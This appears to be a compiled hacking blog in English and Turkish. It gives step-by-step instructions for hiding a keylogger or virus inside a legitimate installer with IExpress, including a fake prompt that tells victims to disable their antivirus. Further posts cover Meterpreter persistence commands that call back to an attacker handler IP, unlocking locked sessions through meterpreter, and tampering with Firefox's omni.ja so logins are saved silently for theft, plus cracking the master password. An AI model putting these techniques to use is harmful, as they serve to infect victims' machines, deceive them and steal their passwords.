FUD binder how to bind keylogger or virus to any exe with Iexpress

How to use Iexpress Binder? 1. Go to Start, then Run and type- “iexpress” and hit on OK.

2. Create new SED (Save Self Extraction Directive), Hit on Next twice. In “Package Title”, enter the name of the software with which you are going to bind your server (keylogger or virus).
Example: - I am binding my Ardamax remote keylogger server with Teracopy. So, I’ll enter Teracopy.

3. In Confirmation Prompt, hit on “Prompt User with” and enter something like this:

“Windows will install necessary files. Please disable your Antivirus before further installation proceeds.”
or
“Please disable your Antivirus before further installation proceeds. As this software performs a pre-crack.”

So, whenever the victim will run our binded file, he will get a message alert to disable his antivirus. This step helps us in bypassing antivirus detection. Hit on Next twice.

4. You will come to “Packaged files” interface. Hit on Add and select the two files you want to bind. Hit on Next.

5. Now, this one is important. In Install Program to launch pane, select the files as

Install Program: Select your server (keylogger or virus) file.

Post Install Command: Select your software (.exe file) with which you want to bind the server.

6. Hit on Next and select “Hidden”. Click on Next twice.

7. In Package Name and Options, hit on Browse and select the path where you want to save the binded file. Also, check “Hide File Extracting Animation from User” and hit on Next.

8. In Configure Restart, select “No Restart” and hit on Next. In SED, select “Don’t save” and hit on Next twice. Iexpress will start binding file for you. Finally, hit on Finish to complete the binding process.

Thus, you have now binded your server to .exe file. Now, simply send this binded file to your victim and ask him to run your binded file on his computer. Once he disables his antivirus, your server will get installed and you can easily hack his email password. The best part of Iexpress file joiner binder is that it is going to remain FUD forever because it is a windows utility. Also, Iexpress file joiner does not corrupt your server.

kilitli oturumu açma

meterpreter session varsa ve bilgisayar kilitliyse

run screen_unlock diyerek bellekte şifreyi disable edip
run vnc yada rdp ile bağlanıp herhangi bir şifre girip enter a basmanız yeterli.

açık olan oturum elinizde

extract msu/msp/msi/exe files on the command line

Microsoft Hotfix Installer (.exe)

setup.exe /t:C:\extracted_files\ /c

Microsoft Update Standalone Package (.msu)

expand -F:* update.msu C:\extracted_files
cd extracted_files
expand -F:* update.cab C:\extracted_files

Microsoft Patch File (.msp)

msix patch.msp /out C:\extracted_files


msix uygulamasına https://docs.google.com/open?id=0ByaI-UvVUk6PZ2lfbThUd1hmWjQ adresinden erişebilirsiniz.

Windows Installer Package (.msi)

msiexec /a setup.msi /qb TARGETDIR=C:\extracted_files

Persistent Meterpereter Session

Önrek 1:

 // After gaining a Meterpreter shell on the target machine, upload and install
 // our persistent agent

 meterpreter > run persistence -S -i 1 -p 443 -r 192.168.1.10

 // -S creates a service on the target machine
 // -i specifies the interval in seconds between connection attemps
 // -p specifies the target port on our handler that the agent will connect to
 // -r specifies the IP address of our handler

 [*] Creating a persistent agent: LHOST=192.168.1.10 LPORT=443 (interval=1 onboot=true)
 [*] Persistent agent script is 614100 bytes long
 [*] Uploaded the persistent agent to C:\WINDOWS\TEMP\oqRUfRY.vbs
 [*] Agent executed with PID 3320
 [*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\FmasPLYc
 [*] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\FmasPLYc
 [*] Creating service ONvoLxVurSB

  Örnek 2:
run persistence -A -L C:\\ -i 10 -p 443 -r 172.16.56.1

The -A parameter will automatically start the multi handler.Another 
option is the -L which allows us to specify the location on the target 
host that the payload will be.For our scenario we have chosen the C:\\ 
as the path in order to find the backdoor easily.The -X option is 
because we want to start the backdoor when the system 
boots.Alternatively there is the -U option.For the interval option we 
have set it to 10 sec and for the port that the backdoor will listen the
 443 which in most windows environments is open.Finally the -r option is
 for our IP address.

Failed to load the OCI library: no such file to load --oci8

Backtrack üzerindeki Metasploit de oracle ile ilgili bir auxiliary modülünü çalıştırırken “Failed to load the OCI library: no such file to load  --oci8” şeklinde bir hatayla karşılaşıldığında yapılacak işlemler şunlardır:

İlk olarak oracle instant client ile ilgili kurulumlar yapılmalıdır.
*Instant Client Package - Basic
*Instant Client Package - SDK (devel)
*Instant Client Package - SQL*Plus  **not needed for metasploit but useful to have

Tüm uygulamalara oracle sitesi üzerinden erişebilir.
http://www.oracle.com/technetwork/topics/linuxsoft-082809.html

Ardından bu uygulamaları kuracağımız dizin oluşturulur.

Mkdir /opt/oracle

Ardından indirilen tüm dosyalar açılır.

Cd /opt/oracle

/opt/oracle/instantclient_10_2#  Unzip /opt/oracle/ basic-10.2.0.5.0-linux.zip
/opt/oracle/instantclient_10_2#  Unzip /opt/oracle/ sdk-10.2.0.5.0-linux.zip
/opt/oracle/instantclient_10_2#  Unzip /opt/oracle/ sqlplus-10.2.0.5.0-linux.zip

Link oluşturulur.

/opt/oracle/instantclient_10_2# ln -s libclntsh.so.10.1 libclntsh.so

Şimdi gerekli environment(çevresel) değişkenleri ayarlayacağız. Değişkenlerin her açılışta tekrar oluşması için bashrc dosyası içine kaydedeceğiz.

vim /root/.bashrc

Dosyanın en altına şu değişkenler eklenir.

export PATH=$PATH:/opt/oracle/instantclient_10_2
export SQLPATH=/opt/oracle/instantclient_10_2
export TNS_ADMIN=/opt/oracle/instantclient_10_2
export LD_LIBRARY_PATH=/opt/oracle/instantclient_10_2
export ORACLE_HOME=/opt/oracle/instantclient_10_2

Ardından ruby için gerekli oci8 driverını kuracağız.

http://rubyforge.org/frs/download.php/65896/ruby-oci8-2.0.3.tar.gz

Dosyayı indirdikten sonra sırasıyla aşağıdaki komutlar çalıştırılır.

tar xvzf ruby-oci8-2.0.3.tar.gz
cd ruby-oci8-2.0.3/
env
LD_LIBRARY_PATH=/opt/oracle/instantclient_10_2/
export LD_LIBRARY_PATH
env | grep LD_LIBRARY_PATH
make
sudo make install


Ancak henüz hala aynı hatayı almaya devam edeceğiz.

    root@bt:~# irb 
    irb(main):001:0> require 'oci8' 
    LoadError: no such file to load -- oci8lib_191 
        from /usr/local/lib/site_ruby/1.9.2/oci8.rb:40:in `require' 
        from /usr/local/lib/site_ruby/1.9.2/oci8.rb:40:in `<top (required)>' 
        from (irb):1:in `require' 
        from (irb):1 
        from /usr/bin/irb:12:in `<main>' 

Görüldüğü gibi oci8lib_191 kütüphanesi bulunamıyor. Bunun için /usr/local/lib/site_ruby/1.9.2/oci8.rb dosyasında bazı değişiklikler yapacağız. Sorun ruby versiyonun istediği oci driverı ile ilgili. Bizim ruby versiyonumuz 1.9.2 olduğundan ve elimizde oci8lib_192 driverı bulunduğundan bunu açtığımız dosyada belirtmemiz gerekiyor.

Normalde oci8.rb dosyasında içerik aşağıdaki gibi:

Case RUBY_VERSION
When /^1\.9/
 Require ‘oci8lib_191’

Biz burada “oci8lib_191” yerine “oci8lib_192” yazacağız.
Oci8lib_192 kütüphanesinin yeri: /usr/local/lib/site_ruby/1.9.2/i486-linux

Şimdi sırada bu kütüphanenin yerini metasploite tanımlamak var. Metasploit açıldığında environment variables ları aldığı bir dosya bulunmaktadır. Dosya setenv.sh ‘dır.
Setenv.sh yeri: /opt/metasploit/scripts

Vim setenv.sh ile dosya açılır. Dosyanın içindeki RUBYLIB ruby kütüphanelerinin yerlerini göstermektedir. Buraya bizim oci8lib_192 kütüphanesinin bulunduğu pathi vereceğiz.

“:/usr/local/lib/site_ruby/1.9.2/:/usr/local/lib/site_ruby/1.9.2/i486-linux”

Yukarıdaki değerler RUBYLIB alanına eklenir.

Bu işlemlerin ardından artık oracle ile ilgili auxiliaryleri çalıştırabileceğiz.
 

======================================================================

IF YOU LIKE THIS ARTICLE PLEASE CLICK ADVERTISEMENTS

MAKALEYİ BEĞENDİYSENİZ LÜTFEN SİTEDEKİ İLANLARI TIKLAYINIZ.

======================================================================

Firefox Password Internals

Firefox till version 3.5 stores the sign-on secrets in signons.txt file located in the Firefox profile directory. With version 3.5 onwards Firefox started storing the sign-on secrets in Sqlite database file named 'signons.sqlite'. The structure of sign-on information stored in the signons.txt file (signons2.txt for version 2 and signons3.txt for version 3) and signons.sqlite for version 3.5 onwards is described below...

For Firefox < version 2.0 First comes the sign-on file header which is always "#2c" Next comes the reject host list in clear text, one per line and terminated with full stop. After that normal host list is stored in the following format Host URL Name  (username or *password) Value (encrypted) .(full stop)    For Firefox version 2.0 First comes the sign-on file header which is always "#2d" Next comes the reject host list in clear text, one per line and ends with full stop. After that normal host list is stored in the following format Host URL Name  (username or *password) Value (encrypted) Subdomain URL .(full stop)    For Firefox version 3.0 and below 3.5 First comes the sign-on file header which is always "#2e" Next comes the excluded host list in clear text, one per line and ends with full stop. After that saved host list is stored in the following format Host URL Name  (username or *password) Value (encrypted) Subdomain URL --- (Dashed line denoting the end of host entry) .(full stop)    For Firefox version 3.5 and above The new signons.sqlite database file has two tables moz_disabledHosts and moz_logins. The moz_disabledHosts table contains list of excluded websites which are exempted from storing passwords by user. The moz_logins table contains all the saved website passwords. Here is more detailed description of each tables... table - moz_disabledHosts id - index of each entry hostname - blacklisted website URL table - moz_logins id - index of each entry hostname - base website URL httpRealm - formSubmitURL - Actual website hosting URL for which secrets are saved. usernameField - name of username element of form field passwordField - name of password element of form field encryptedUsername - encrypted username encryptedPassword - encrypted password guid - unique GUID for each entry encType - value 1 indicates encrypted

Here each Host entry can have multiple username/password pairs. Starting from Firefox version 2.0, sub domain URL is also included along with username/password entry. If it is the password field then it begins with '*'. This is the key in distinguishing between username and password entry. Now once the username and password values are extracted, next task is to decrypt them. Information required to decrypt these values is stored in key3.db file. If the master password is set, then you must provide the master password to proceed with decryption. If you have forgotten the master password, then you can use Firemaster tool to recover the master password. If the master password is set and if you have not provided it, then FirePasswordViewer will prompt you to enter the master password.

Firefox 11 Şifrelerini Ele Geçirme

Aslında yeni bir yöntem anlatmayacağım eski versiyonda olan yöntemi güncellenmiş halde veriyorum.

eski versiyonlarda omni.jar olarak bilinen yeni versiyonda omni.ja olarak adı değiştirilen jar dosyası içinde nsLoginManagerPrompter.js adlı dosyada biraz değişiklik yaparak kullanıcı adı ve parola ile girişlerinizin size sormadan otomatik olarak sqlite veritabanına kaydedilmesini sağlıyoruz ve daha FirefoxPasswordViewer programıyla kaydedilmiş bilgileri öğrenebiliyoruz (bu program yerine kendi kodumu geliştiriyorum)

bu dosya içerisinde
canRememberLogin değerini false yapan bütün kısımları iptal edersen tüm parolalar veritabanına kaydedilir.

ayrıca _showSaveLoginNotification parametresini kapatarak da kaydedip kaydetmeyeceği uyarısını engelleyebilirsin ama bence bu uyarı çıksın adam kaydetme dese bile sen arka planda canRememberLogin i değiştirdiğin için kaydedecektir (test etme fırsatım olmadı) 

 Firefox ta kaydedilen şifreleri korumak için master password oluşturabilirsiniz fakat default olarak bu kapalıdır. Varsayalım ki kurban master password koymuş bu durumda 

http://securityxploded.com/firemaster.php

adresinden indirebileceğiniz firemaster uygulaması ile dictionary,bruteforce gibi ataklarla bu şifreyi kırabilirsiniz. 

Firemaster uygulamasının source kodu açık olduğu için oradaki kodları kullanarak kendinizde dictionary hybrid (akıllı dictionarı yani varolan kelimeleri birleştirerek), brute force saldırı yapabilen bir tool yazabilirsiniz